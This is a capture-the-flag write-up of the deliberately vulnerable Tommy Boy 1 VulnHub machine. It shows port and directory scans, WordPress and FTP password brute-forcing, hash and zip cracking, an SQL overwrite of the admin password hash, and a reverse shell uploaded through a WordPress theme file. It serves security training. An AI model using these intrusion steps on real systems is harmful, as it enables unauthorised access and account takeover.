Recon
NMAP Complete Scan
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
# Nmap 7.92 scan initiated Tue Jan 18 04:38:15 2022 as: nmap -vv --reason -Pn -T4 -sV -sC --version-all -A --osscan-guess -p- -oN /root/vulnHub/TommyBoy1/192.168.56.129/scans/_full_tcp_nmap.txt -oX /root/vulnHub/TommyBoy1/192.168.56.129/scans/xml/_full_tcp_nmap.xml 192.168.56.129
mass_dns: warning: Unable to determine any DNS servers. Reverse DNS is disabled. Try using --system-dns or specify valid servers with --dns-servers
adjust_timeouts2: packet supposedly had rtt of -607880 microseconds. Ignoring time.
adjust_timeouts2: packet supposedly had rtt of -607880 microseconds. Ignoring time.
adjust_timeouts2: packet supposedly had rtt of -608174 microseconds. Ignoring time.
adjust_timeouts2: packet supposedly had rtt of -608174 microseconds. Ignoring time.
adjust_timeouts2: packet supposedly had rtt of -532989 microseconds. Ignoring time.
adjust_timeouts2: packet supposedly had rtt of -532989 microseconds. Ignoring time.
adjust_timeouts2: packet supposedly had rtt of -532171 microseconds. Ignoring time.
adjust_timeouts2: packet supposedly had rtt of -532171 microseconds. Ignoring time.
adjust_timeouts2: packet supposedly had rtt of -354959 microseconds. Ignoring time.
adjust_timeouts2: packet supposedly had rtt of -354959 microseconds. Ignoring time.
Nmap scan report for 192.168.56.129
Host is up, received arp-response (0.00076s latency).
Scanned at 2022-01-18 04:38:16 +08 for 21s
Not shown: 65532 closed tcp ports (reset)
PORT STATE SERVICE REASON VERSION
22/tcp open ssh syn-ack ttl 64 OpenSSH 7.2p2 Ubuntu 4ubuntu1 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 a0:ca:62:ce:f6:7e:ae:8b:62:de:0b:db:21:3f:b0:d6 (RSA)
| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDDi74A2GW2LYOIaOCt3+uBb2ecZSCL0EKylLIwMoKts0TvVdP82C/Ajp0FF2r2DjDw7QxvGtdkOiprtsyVmznzEfKnuuiBNpcBhj297sukKvVBKfDiTv51DvbeqKhQEDdZGlj2ZJWtit+EAxndPQEMs4Jr48mLjQhb/D6P78DEfKlGOlRBlaj3PVMVzNifEEhYF3pYDxbkQ4RFOILMiQGo7IOoMrxJBYYzDxwQ2dXyTElJ4++M/zGojF3wRDqLq2v35xyZWmsG+5mA93aAo7R9sFELQNzGhdHc33FapQPe/tcAO4AdCU8Ex4I20Na4T+pN73//wOwyNOO49d7pCrOP
| 256 46:6d:4b:4b:02:86:89:27:28:5c:1d:87:10:55:3d:59 (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBElpjsbihyk+MUGgJDx0lD/yU2pii+FxZ6jHwI6w/SyeYUDoLS50o98T0SRLJHEfAnVaR9eFAKoOI/LiBQ+UTWY=
| 256 56:9e:71:2a:a3:83:ff:63:11:7e:94:08:dd:28:1d:46 (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIPN6HuPH7beQC1yRgoJaL+p2JhW62bu1xgCoKo4EPvFM
80/tcp open http syn-ack ttl 64 Apache httpd 2.4.18 ((Ubuntu))
|_http-title: Welcome to Callahan Auto
| http-robots.txt: 4 disallowed entries
| /6packsofb...soda /lukeiamyourfather
|_/lookalivelowbridge /flag-numero-uno.txt
| http-methods:
|_ Supported Methods: OPTIONS GET HEAD POST
|_http-server-header: Apache/2.4.18 (Ubuntu)
8008/tcp open http syn-ack ttl 64 Apache httpd 2.4.18 ((Ubuntu))
|_http-title: KEEP OUT
| http-methods:
|_ Supported Methods: OPTIONS GET HEAD POST
|_http-server-header: Apache/2.4.18 (Ubuntu)
MAC Address: 08:00:27:C2:EF:FB (Oracle VirtualBox virtual NIC)
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.9
TCP/IP fingerprint:
OS:SCAN(V=7.92%E=4%D=1/18%OT=22%CT=1%CU=30056%PV=Y%DS=1%DC=D%G=Y%M=080027%T
OS:M=61E5D3CE%P=x86_64-pc-linux-gnu)SEQ(SP=104%GCD=1%ISR=109%TI=Z%CI=I%II=I
OS:%TS=8)SEQ(SP=104%GCD=1%ISR=109%TI=Z%II=I%TS=8)OPS(O1=M5B4ST11NW7%O2=M5B4
OS:ST11NW7%O3=M5B4NNT11NW7%O4=M5B4ST11NW7%O5=M5B4ST11NW7%O6=M5B4ST11)WIN(W1
OS:=7120%W2=7120%W3=7120%W4=7120%W5=7120%W6=7120)ECN(R=Y%DF=Y%TG=40%W=7210%
OS:O=M5B4NNSNW7%CC=Y%Q=)ECN(R=Y%DF=Y%T=40%W=7210%O=M5B4NNSNW7%CC=Y%Q=)T1(R=
OS:Y%DF=Y%TG=40%S=O%A=S+%F=AS%RD=0%Q=)T1(R=Y%DF=Y%T=40%S=O%A=S+%F=AS%RD=0%Q
OS:=)T2(R=N)T3(R=N)T4(R=N)T4(R=Y%DF=Y%T=40%W=0%S=O%A=Z%F=R%O=%RD=0%Q=)T5(R=
OS:Y%DF=Y%TG=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T5(R=Y%DF=Y%T=40%W=0%S=Z%A=O%F
OS:=AR%O=%RD=0%Q=)T6(R=Y%DF=Y%TG=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T6(R=Y%DF=Y%
OS:T=40%W=0%S=O%A=Z%F=R%O=%RD=0%Q=)T7(R=Y%DF=Y%TG=40%W=0%S=Z%A=S+%F=AR%O=%R
OS:D=0%Q=)T7(R=Y%DF=Y%T=40%W=0%S=Z%A=O%F=AR%O=%RD=0%Q=)U1(R=N)U1(R=Y%DF=N%T
OS:=40%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G)IE(R=Y%DFI=N%TG=40%CD
OS:=S)IE(R=Y%DFI=N%T=40%CD=S)
Uptime guess: 199.639 days (since Fri Jul 2 13:18:43 2021)
Network Distance: 1 hop
TCP Sequence Prediction: Difficulty=260 (Good luck!)
IP ID Sequence Generation: All zeros
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
TRACEROUTE
HOP RTT ADDRESS
1 0.76 ms 192.168.56.129
Read data files from: /usr/bin/../share/nmap
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Tue Jan 18 04:38:38 2022 -- 1 IP address (1 host up) scanned in 23.01 seconds
TCP/80 (HTTP)
FFUF - common.txt
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
┌──(root💀kali)-[~/vulnHub/TommyBoy1]
└─# ffuf -u http://192.168.56.129/FUZZ -w /usr/share/wordlists/dirb/common.txt -fc 301
/'___\ /'___\ /'___\
/\ \__/ /\ \__/ __ __ /\ \__/
\ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\
\ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/
\ \_\ \ \_\ \ \____/ \ \_\
\/_/ \/_/ \/___/ \/_/
v1.3.1 Kali Exclusive <3
________________________________________________
:: Method : GET
:: URL : http://192.168.56.129/FUZZ
:: Wordlist : FUZZ: /usr/share/wordlists/dirb/common.txt
:: Follow redirects : false
:: Calibration : false
:: Timeout : 10
:: Threads : 40
:: Matcher : Response status: 200,204,301,302,307,401,403,405
:: Filter : Response status: 301
________________________________________________
.hta [Status: 403, Size: 293, Words: 22, Lines: 12]
[Status: 200, Size: 1176, Words: 164, Lines: 18]
.htaccess [Status: 403, Size: 298, Words: 22, Lines: 12]
.htpasswd [Status: 403, Size: 298, Words: 22, Lines: 12]
cgi-bin/ [Status: 200, Size: 745, Words: 52, Lines: 16]
index.html [Status: 200, Size: 1176, Words: 164, Lines: 18]
robots.txt [Status: 200, Size: 132, Words: 6, Lines: 6]
server-status [Status: 403, Size: 302, Words: 22, Lines: 12]
:: Progress: [4614/4614] :: Job [1/1] :: 429 req/sec :: Duration: [0:00:04] :: Errors: 0 ::
TCP/8008 (HTTP)
FFUF - common.txt
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
┌──(root💀kali)-[~/vulnHub/TommyBoy1]
└─# ffuf -u http://192.168.56.129:8008/FUZZ -w /usr/share/wordlists/dirb/common.txt
/'___\ /'___\ /'___\
/\ \__/ /\ \__/ __ __ /\ \__/
\ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\
\ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/
\ \_\ \ \_\ \ \____/ \ \_\
\/_/ \/_/ \/___/ \/_/
v1.3.1 Kali Exclusive <3
________________________________________________
:: Method : GET
:: URL : http://192.168.56.129:8008/FUZZ
:: Wordlist : FUZZ: /usr/share/wordlists/dirb/common.txt
:: Follow redirects : false
:: Calibration : false
:: Timeout : 10
:: Threads : 40
:: Matcher : Response status: 200,204,301,302,307,401,403,405
________________________________________________
.htaccess [Status: 403, Size: 300, Words: 22, Lines: 12]
.htpasswd [Status: 403, Size: 300, Words: 22, Lines: 12]
.hta [Status: 403, Size: 295, Words: 22, Lines: 12]
[Status: 200, Size: 295, Words: 35, Lines: 13]
index.html [Status: 200, Size: 295, Words: 35, Lines: 13]
server-status [Status: 403, Size: 304, Words: 22, Lines: 12]
:: Progress: [4614/4614] :: Job [1/1] :: 4853 req/sec :: Duration: [0:00:01] :: Errors: 0 ::
Obtaining Initial Foothold
TCP/80 (HTTP) - Image Forensics + Wordpress (Protected Post Bruteforce)
- Proceed to
/robots1 2 3 4 5 6 7
┌──(root💀kali)-[~/vulnHub/TommyBoy1] └─# curl http://192.168.56.129/robots.txt User-agent: * Disallow: /6packsofb...soda Disallow: /lukeiamyourfather Disallow: /lookalivelowbridge Disallow: /flag-numero-uno.txt
- Proceed to directories in robots.txt
/6packsofb...soda![images/TommyBoy1 6packsofb...soda.png]()
/lukeiamyourfather![TommyBoy1 lukeiamyourfather.png]()
/lookalivelowbridge![TommyBoy1 lookalivelowbridge.png]()
/flag-numero-uno.txt(Found 1st Flag)![TommyBoy1 Flag1.png]()
- B34rcl4ws
- Check for any hidden files
1
binwalk -eM *
![TommyBoy1 binwalk.png]()
- No hidden files
- Proceed to
index.html& view page source![TommyBoy1 index .png]()
- Mentioned that hidden web dir can be found in a youtube video
- Found hidden web directory
/prehistoricforest![]()
![]()
- Enumerate wp users
1
wpscan --no-update --disable-tls-checks --url http://tommyboy/prehistoricforest/ -e u -f cli-no-color 2>&1 | tee "/root/vulnHub/TommyBoy1/192.168.56.129/scans/tcp80/tcp_80_http_wpscan_users_enum.txt"
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19
[+] URL: http://tommyboy/prehistoricforest/ [192.168.56.129] [i] User(s) Identified: [+] michelle | Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection) | Confirmed By: Login Error Messages (Aggressive Detection) [+] richard | Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection) | Confirmed By: Login Error Messages (Aggressive Detection) [+] tom | Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection) | Confirmed By: Login Error Messages (Aggressive Detection) [+] tommy | Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection) | Confirmed By: Login Error Messages (Aggressive Detection)
- Store them in a wordlist
- Enumerate wp plugins
1
wpscan --no-update --disable-tls-checks --plugins-detection aggressive --plugins-version-detection aggressive --url http://tommyboy/prehistoricforest/ -e ap -f cli-no-color 2>&1 | tee "/root/vulnHub/TommyBoy1/192.168.56.129/scans/tcp80/tcp_80_http_wpscan_plugin_enum.txt"
1 2 3 4 5 6 7 8 9 10 11
[i] Plugin(s) Identified: [+] akismet | Location: http://tommyboy/prehistoricforest/wp-content/plugins/akismet/ | Latest Version: 4.2.1 | Last Updated: 2021-10-01T18:28:00.000Z | | Found By: Known Locations (Aggressive Detection) | - http://tommyboy/prehistoricforest/wp-content/plugins/akismet/, status: 403 | | The version could not be determined.
- Not exploitable
- Bruteforce
1
wpscan --no-update --disable-tls-checks --wp-content-dir wp-admin --url http://tommyboy/prehistoricforest/ --usernames usernames.txt --passwords /usr/share/wordlists/rockyou.txt -f cli-no-color 2>&1 | tee "/root/vulnHub/TommyBoy1/192.168.56.129/scans/tcp80/tcp_80_http_wpscan_bruteforce.txt"
- While bruteforcing, look for useful information in the wordpress blog
- Found 2nd Flag
![]()
![]()
- Proceed to “Son OF A!” Post
![]()
- Proceed to
/richard& download image![]()
- Check for hidden files/text
1 2 3
┌──(root💀kali)-[~/vulnHub/TommyBoy1/192.168.56.129/loot/http] └─# exiftool shockedrichard.jpg |grep "User Comment" User Comment : ce154b5a8e59c89732bc25d6a2e6b90b
- Looks like a hash
- Crack hash w/ hashcat
1 2 3
┌──(root💀kali)-[~/vulnHub/TommyBoy1/192.168.56.129/loot/http] └─# hashcat -a 0 -m 0 "ce154b5a8e59c89732bc25d6a2e6b90b" /usr/share/wordlists/rockyou.txt --show ce154b5a8e59c89732bc25d6a2e6b90b:spanky
- spanky
- Proceed to the password-locked post
![]()
- Useful Information
- A backup file called
callahanbak.bak(FTP) Server that goes online for 15 minutes then down for 15 minutes - A user called
nickburnswhose password is easy to guess
- A backup file called
- Useful Information
- Do an NMAP Scan again
1 2 3 4 5
PORT STATE SERVICE 22/tcp open ssh 80/tcp open http 8008/tcp open http 65534/tcp open unknown
- 65534 wasn’t up in the initial scan, it is likely the FTP Server
- Bruteforce
1 2 3 4 5 6
┌──(root💀kali)-[~/vulnHub/TommyBoy1/192.168.56.129/exploit/bruteforce] └─# hydra -l nickburns -P /usr/share/wordlists/SecLists/Passwords/Common-Credentials/top-20-common-SSH-passwords.txt ftp://$ip -s 65534 -e nsr [DATA] max 16 tasks per 1 server, overall 16 tasks, 25 login tries (l:1/p:25), ~2 tries per task [DATA] attacking ftp://192.168.56.129:65534/ [65534][ftp] host: 192.168.56.129 login: nickburns password: nickburns 1 of 1 target successfully completed, 1 valid password found
- nickburns:nickburns
TCP/65534 (FTP)
- Access FTP w/ nickburns:nickburns, check for write access
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22
┌──(root💀kali)-[~/vulnHub/TommyBoy1/192.168.56.129/loot/ftp] └─# ftp -nv $ip 65534 Connected to 192.168.56.129. 220 Callahan_FTP_Server 1.3.5 ftp> user nickburns 331 Password required for nickburns Password: 230 User nickburns logged in Remote system type is UNIX. Using binary mode to transfer files. ftp> put test local: test remote: test 200 PORT command successful 150 Opening BINARY mode data connection for test 226 Transfer complete ftp> dir 200 PORT command successful 150 Opening ASCII mode data connection for file list -rw-rw-r-- 1 nickburns nickburns 977 Jul 15 2016 readme.txt -rw-r--r-- 1 nickburns nickburns 0 Jan 18 08:10 test 226 Transfer complete ftp>
- We have write access
- Download all files
1 2 3 4 5 6
┌──(root💀kali)-[~/vulnHub/TommyBoy1/192.168.56.129/loot/ftp] └─# wget -m --no-passive ftp://nickburns:nickburns@$ip:65534 --2022-01-18 16:44:57-- ftp://nickburns:*password*@192.168.56.129:65534/ => ‘192.168.56.129:65534/.listing’ Connecting to 192.168.56.129:65534... connected. Logging in as nickburns ... Logged in! - View
readme.txt![]()
- Useful Information
NickIzL33tdirectory- “look at on your phone later” suggests that its a web directory
- Useful Information
- Fuzz web directory
TCP/8008 (HTTP) - Generate Wordlist + Password Cracking
- Proceed to
index.html![]()
- Was stuck here for a long time, Steve Job is a hint to switch user-agent to iphone.
- Switch User-Agent to iphone
![]()
- We have to FUZZ for
.htmlfile
- We have to FUZZ for
- Fuzz it
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26
┌──(root💀kali)-[~/vulnHub/TommyBoy1/192.168.56.129/loot/ftp/192.168.56.129:65534] └─# ffuf -fw 29 -H "User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1" -u http://192.168.56.129:8008/NickIzL33t/FUZZ -w /usr/share/wordlists/rockyou.txt -e ".html" /'___\ /'___\ /'___\ /\ \__/ /\ \__/ __ __ /\ \__/ \ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\ \ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/ \ \_\ \ \_\ \ \____/ \ \_\ \/_/ \/_/ \/___/ \/_/ v1.3.1 Kali Exclusive <3 ________________________________________________ :: Method : GET :: URL : http://192.168.56.129:8008/NickIzL33t/FUZZ :: Wordlist : FUZZ: /usr/share/wordlists/rockyou.txt :: Header : User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1 :: Extensions : .html :: Follow redirects : false :: Calibration : false :: Timeout : 10 :: Threads : 40 :: Matcher : Response status: 200,204,301,302,307,401,403,405 :: Filter : Response words: 29 ________________________________________________ fallon1.html [Status: 200, Size: 459, Words: 56, Lines: 13]- Found
fallon1.html
- Found
- Proceed to
fallon1.html![]()
- Proceed to directories found in
fallon1.html - Password Requirements
- bev
- One uppercase character
- Two numbers
- Two lowercase character
- One symbol
- 1995
- Create password generator python script
1 2 3 4 5 6 7 8 9 10 11 12
#!/usr/bin/python #https://docs.python.org/3/library/string.html from string import ascii_uppercase from string import ascii_lowercase from string import punctuation for a in ascii_uppercase: for b in range(0, 10): for c in range (0, 10): for d in ascii_lowercase: for e in ascii_lowercase: for f in punctuation: print("bev" + str(a) + str(b) + str(c) + str(d) + str(e) + str(f) + "1995") - Generate password word list.
1
python passwordgen.py > passwords.txt
- Download zip
1
wget http://192.168.56.129:8008/NickIzL33t/t0msp4ssw0rdz.zip --header="User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1"
- Crack zip
1 2 3 4 5
┌──(root💀kali)-[~/vulnHub/TommyBoy1/192.168.56.129/exploit/bruteforce] └─# fcrackzip -v -u -D -p passwords.txt t0msp4ssw0rdz.zip found file 'passwords.txt', (size cp/uc 332/ 641, flags 9, chk 9aad) checking pw bevG93kv~1995 PASSWORD FOUND!!!!: pw == bevH00tr$1995
- Unzip & view contents
![]()
- Wordpress Draft contains last 4 digit of password
- Stuck here again, famous Queen song has too many possiblities & the password could be the lyrics as well.
TCP/80 (HTTP) - Wordpress (Bruteforce)
- Bruteforce against tom’s account (tommy, tom) w/ rockyou.txt
1
wpscan --no-update --disable-tls-checks --wp-content-dir wp-admin --url http://tommyboy/prehistoricforest/ --usernames usernames.txt --passwords /usr/share/wordlists/rockyou.txt -f cli-no-color 2>&1 | tee "/root/vulnHub/TommyBoy1/192.168.56.129/scans/tcp80/tcp_80_http_wpscan_bruteforce.txt"
1 2 3
[+] Performing password attack on Wp Login against 2 user/s Progress: |== | [SUCCESS] - tom / tomtom1
- Login w/ tom:tomtom1 & find draft
![]()
- fatguyinalittlecoat1938!!
TCP/22 (SSH)
- SSH w/ found creds
![]()
- Obtain 4th flag
![]()
- Hint
- /5.txt
- Hint
Privilege Escalation
www-data
- Find
5.txt1 2 3 4 5
bigtommysenior@CallahanAutoSrv01:/tmp$ find / 2>/dev/null | grep -i 5.txt /lib/firmware/ath10k/QCA6174/hw2.1/notice_ath10k_firmware-5.txt /lib/firmware/ath10k/QCA988X/hw2.0/notice_ath10k_firmware-5.txt /lib/firmware/ath10k/QCA99X0/hw2.0/notice_ath10k_firmware-5.txt /.5.txt # <-this
- Check
/.5.txtpermissions1 2
bigtommysenior@CallahanAutoSrv01:~$ ls -l /.5.txt -rwxr-x--- 1 www-data www-data 520 Jul 7 2016 /.5.txt
- Obtain creds from
wp-config.php![]()
- wordpressuser:CaptainLimpWrist!!!
- Replace wordpress admin user (richard) password w/ tom’s
1 2 3 4
# First user in the database is usually the admin UPDATE wp_users SET user_pass = '$P$BmXAz/a8CaPZDNTraFb/g6kZeTpijK.' WHERE ID = 1;
1 2 3 4 5
mysql> UPDATE wp_users -> SET user_pass = '$P$BmXAz/a8CaPZDNTraFb/g6kZeTpijK.' -> WHERE ID = 1; Query OK, 1 row affected (0.00 sec) Rows matched: 1 Changed: 1 Warnings: 0
- richard:tomtom1
- Login w/ richard:tomtom1, upload reverse shell
![]()
- Execute reverse shell at
prehistoricforest/wp-content/themes/twentysixteen/404.php
- www-data shell obtained
![]()
- Obtain 5th flag
![]()
- Compile the flags
1 2 3 4 5 6 7 8
┌──(root💀kali)-[~/vulnHub/TommyBoy1] └─# python3 Python 3.9.9 (main, Dec 16 2021, 23:13:29) [GCC 11.2.0] on linux Type "help", "copyright", "credits" or "license" for more information. >>> print ("B34rcl4ws" + "Z4l1nsky" + "TinyHead" + "EditButton" + "Buttcrack") B34rcl4wsZ4l1nskyTinyHeadEditButtonButtcrack >>> - Obtain final flag
![]()
Comments powered by Disqus.